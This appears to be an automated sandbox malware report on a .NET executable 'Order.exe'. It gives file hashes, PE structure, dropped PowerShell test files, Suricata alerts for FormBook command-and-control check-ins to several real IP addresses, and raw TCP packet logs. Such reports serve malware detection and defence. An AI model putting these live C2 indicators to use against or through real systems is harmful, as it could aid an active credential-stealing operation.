                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uyi3omke.qbh.psm1

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zykndro0.pir.ps1

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Entropy (8bit):7.6799246777934105
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                  File name:Order.exe
                                                                                                                                  File size:814'592 bytes
                                                                                                                                  MD5:879bfdca45455cfe5b122b8ad287b393
                                                                                                                                  SHA1:a348b566aec66df4baa69cfa826d62707c871a4f
                                                                                                                                  SHA256:02253d28e37b943a2d0dbbb8e3a1b53f61d63016e6e12c2ba7f5eb2d5da348b8
                                                                                                                                  SHA512:732cedfcb0802d307e2a08edc018e68e9d585e85d315a29405a62004c54a71cc8ae13112c2a4865353b6fced7705ac34c2e108440f7080b5dc50340db11dc6f7
                                                                                                                                  SSDEEP:24576:854mEbkr3CKiq7q5JSFKIHhvJkogFGnPW:yjOK97ASDv3gFQ
                                                                                                                                  TLSH:8605E04013A9DA11E5B21BB84471D3F807BA7E9AB835D3278EDABCEB3D317465810793
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E................0..d............... ........@.. ....................................@................................

                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:90cececece8e8eb0

                                                                                                                                  Static PE Info

                                                                                                                                  General

                                                                                                                                  Entrypoint:0x4c83d6
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                  Time Stamp:0x990045F9 [Fri May 5 20:39:21 2051 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:4
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:4
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:4
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                  Entrypoint Preview

                                                                                                                                  Instruction
                                                                                                                                  jmp dword ptr [00402000h]
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al
                                                                                                                                  add byte ptr [eax], al

                                                                                                                                  Data Directories

                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xc83810x4f.text
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xca0000x584.rsrc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xcc0000xc.reloc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xc47400x70.text
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                  Sections

                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  .text0x20000xc63dc0xc64008afc52290bb2194cb25a08aebe510c25False0.8809874487704918data7.687118914880025IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                  .rsrc0xca0000x5840x600298e73bd31744f3156bb6ab8a41148abFalse0.4153645833333333data4.020412397226098IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .reloc0xcc0000xc0x200ea0ba78a27121f1d71984e8022573a29False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                  Resources

                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                  RT_VERSION0xca0900x2f4data0.44047619047619047
                                                                                                                                  RT_MANIFEST0xca3940x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                  Imports

                                                                                                                                  DLLImport
                                                                                                                                  mscoree.dll_CorExeMain

                                                                                                                                  Network Behavior

                                                                                                                                  Suricata IDS Alerts

                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                  2024-10-24T08:01:36.389283+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44974135.156.117.13180TCP
                                                                                                                                  2024-10-24T08:01:53.136123+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497423.33.130.19080TCP
                                                                                                                                  2024-10-24T08:01:54.800687+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497433.33.130.19080TCP
                                                                                                                                  2024-10-24T08:01:57.357112+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497463.33.130.19080TCP
                                                                                                                                  2024-10-24T08:02:00.059415+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497523.33.130.19080TCP
                                                                                                                                  2024-10-24T08:02:14.222615+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4498083.33.130.19080TCP
                                                                                                                                  2024-10-24T08:02:16.748286+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4498243.33.130.19080TCP
                                                                                                                                  2024-10-24T08:02:19.405720+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4498403.33.130.19080TCP
                                                                                                                                  2024-10-24T08:02:21.866748+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4498513.33.130.19080TCP
                                                                                                                                  2024-10-24T08:02:28.495447+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449881206.119.82.13480TCP
                                                                                                                                  2024-10-24T08:02:31.026603+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449893206.119.82.13480TCP
                                                                                                                                  2024-10-24T08:02:33.589134+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449909206.119.82.13480TCP
                                                                                                                                  2024-10-24T08:02:36.136007+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449922206.119.82.13480TCP
                                                                                                                                  2024-10-24T08:02:42.042625+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449956162.213.249.21680TCP
                                                                                                                                  2024-10-24T08:02:44.605479+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449967162.213.249.21680TCP
                                                                                                                                  2024-10-24T08:02:47.847054+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449978162.213.249.21680TCP
                                                                                                                                  2024-10-24T08:02:50.391000+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449994162.213.249.21680TCP
                                                                                                                                  2024-10-24T08:02:56.397433+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450024217.160.0.23180TCP
                                                                                                                                  2024-10-24T08:02:58.870386+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450025217.160.0.23180TCP
                                                                                                                                  2024-10-24T08:03:01.433060+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450026217.160.0.23180TCP
                                                                                                                                  2024-10-24T08:03:04.071658+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450027217.160.0.23180TCP
                                                                                                                                  2024-10-24T08:03:10.911969+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002854.179.173.6080TCP
                                                                                                                                  2024-10-24T08:03:13.448531+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002954.179.173.6080TCP
                                                                                                                                  2024-10-24T08:03:16.745453+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003054.179.173.6080TCP
                                                                                                                                  2024-10-24T08:03:19.276704+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45003154.179.173.6080TCP
                                                                                                                                  2024-10-24T08:03:25.997357+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500323.33.130.19080TCP
                                                                                                                                  2024-10-24T08:03:27.648222+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500333.33.130.19080TCP
                                                                                                                                  2024-10-24T08:03:31.365939+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500343.33.130.19080TCP
                                                                                                                                  2024-10-24T08:03:33.752288+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500353.33.130.19080TCP
                                                                                                                                  2024-10-24T08:03:48.262622+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450036156.226.22.23380TCP
                                                                                                                                  2024-10-24T08:03:50.762469+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450037156.226.22.23380TCP
                                                                                                                                  2024-10-24T08:03:53.453728+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450038156.226.22.23380TCP
                                                                                                                                  2024-10-24T08:03:55.854839+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450039156.226.22.23380TCP
                                                                                                                                  2024-10-24T08:04:01.903301+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004052.20.84.6280TCP
                                                                                                                                  2024-10-24T08:04:04.442206+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004152.20.84.6280TCP
                                                                                                                                  2024-10-24T08:04:07.013442+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004252.20.84.6280TCP
                                                                                                                                  2024-10-24T08:04:09.616741+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45004352.20.84.6280TCP
                                                                                                                                  2024-10-24T08:04:15.293628+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500443.33.130.19080TCP
                                                                                                                                  2024-10-24T08:04:18.730659+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500453.33.130.19080TCP
                                                                                                                                  2024-10-24T08:04:21.276828+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500463.33.130.19080TCP
                                                                                                                                  2024-10-24T08:04:23.950321+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500473.33.130.19080TCP
                                                                                                                                  2024-10-24T08:04:30.292422+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450048142.250.186.8380TCP
                                                                                                                                  2024-10-24T08:04:32.886050+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450049142.250.186.8380TCP
                                                                                                                                  2024-10-24T08:04:35.417323+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450050142.250.186.8380TCP
                                                                                                                                  2024-10-24T08:04:37.964229+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450051142.250.186.8380TCP
                                                                                                                                  2024-10-24T08:04:43.597788+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450052172.81.61.22480TCP
                                                                                                                                  2024-10-24T08:04:46.153041+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450053172.81.61.22480TCP
                                                                                                                                  2024-10-24T08:04:48.861760+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450054172.81.61.22480TCP
                                                                                                                                  2024-10-24T08:04:51.399211+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450055172.81.61.22480TCP
                                                                                                                                  2024-10-24T08:04:57.080718+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500563.33.130.19080TCP
                                                                                                                                  2024-10-24T08:05:00.514602+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500573.33.130.19080TCP
                                                                                                                                  2024-10-24T08:05:02.190581+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500583.33.130.19080TCP
                                                                                                                                  2024-10-24T08:05:04.938835+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500593.33.130.19080TCP

                                                                                                                                  Network Port Distribution

                                                                                                                                  TCP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Oct 24, 2024 08:01:35.032022953 CEST4974180192.168.2.435.156.117.131
                                                                                                                                  Oct 24, 2024 08:01:35.038832903 CEST804974135.156.117.131192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:35.039031982 CEST4974180192.168.2.435.156.117.131
                                                                                                                                  Oct 24, 2024 08:01:35.048039913 CEST4974180192.168.2.435.156.117.131
                                                                                                                                  Oct 24, 2024 08:01:35.054120064 CEST804974135.156.117.131192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:36.388943911 CEST804974135.156.117.131192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:36.388976097 CEST804974135.156.117.131192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:36.389282942 CEST4974180192.168.2.435.156.117.131
                                                                                                                                  Oct 24, 2024 08:01:36.510257959 CEST804974135.156.117.131192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:36.510582924 CEST4974180192.168.2.435.156.117.131
                                                                                                                                  Oct 24, 2024 08:01:36.515369892 CEST4974180192.168.2.435.156.117.131
                                                                                                                                  Oct 24, 2024 08:01:36.520786047 CEST804974135.156.117.131192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:51.598464966 CEST4974280192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:01:51.605376005 CEST80497423.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:51.605652094 CEST4974280192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:01:51.624667883 CEST4974280192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:01:51.630078077 CEST80497423.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:53.136122942 CEST4974280192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:01:53.141882896 CEST80497423.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:53.141985893 CEST4974280192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:01:54.161360979 CEST4974380192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:01:54.167274952 CEST80497433.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:54.167433023 CEST4974380192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:01:54.184232950 CEST4974380192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:01:54.189758062 CEST80497433.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:54.800537109 CEST80497433.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:54.800687075 CEST4974380192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:01:55.698780060 CEST4974380192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:01:55.704463959 CEST80497433.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:56.721874952 CEST4974680192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:01:56.728631973 CEST80497463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:56.728743076 CEST4974680192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:01:56.743837118 CEST4974680192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:01:56.749579906 CEST80497463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:56.749613047 CEST80497463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:56.749640942 CEST80497463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:56.749685049 CEST80497463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:56.749711990 CEST80497463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:56.749744892 CEST80497463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:56.749800920 CEST80497463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:56.749828100 CEST80497463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:56.749859095 CEST80497463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:57.356982946 CEST80497463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:57.357111931 CEST4974680192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:01:58.245618105 CEST4974680192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:01:58.251699924 CEST80497463.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:59.265512943 CEST4975280192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:01:59.430695057 CEST80497523.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:01:59.431076050 CEST4975280192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:01:59.444020987 CEST4975280192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:01:59.449465990 CEST80497523.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:00.058722973 CEST80497523.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:00.059257984 CEST80497523.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:00.059415102 CEST4975280192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:00.061943054 CEST4975280192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:00.067830086 CEST80497523.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:13.270533085 CEST4980880192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:13.589555025 CEST80498083.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:13.589667082 CEST4980880192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:13.601144075 CEST4980880192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:13.606494904 CEST80498083.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:14.222521067 CEST80498083.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:14.222615004 CEST4980880192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:15.104969025 CEST4980880192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:15.110605955 CEST80498083.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:16.124327898 CEST4982480192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:16.129751921 CEST80498243.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:16.129864931 CEST4982480192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:16.141700983 CEST4982480192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:16.149092913 CEST80498243.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:16.748100996 CEST80498243.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:16.748286009 CEST4982480192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:17.652205944 CEST4982480192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:17.657737970 CEST80498243.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:18.670934916 CEST4984080192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:18.676397085 CEST80498403.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:18.676573992 CEST4984080192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:18.692248106 CEST4984080192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:18.697777987 CEST80498403.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:18.697792053 CEST80498403.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:18.697808981 CEST80498403.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:18.697817087 CEST80498403.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:18.697824001 CEST80498403.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:18.697830915 CEST80498403.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:18.697841883 CEST80498403.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:18.697928905 CEST80498403.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:18.697940111 CEST80498403.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:19.405627966 CEST80498403.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:19.405719995 CEST4984080192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:19.656176090 CEST80498403.33.130.190192.168.2.4
                                                                                                                                  Oct 24, 2024 08:02:19.656249046 CEST4984080192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:20.198798895 CEST4984080192.168.2.43.33.130.190
                                                                                                                                  Oct 24, 2024 08:02:20.204170942 CEST80498403.33.130.190192.168.2.4
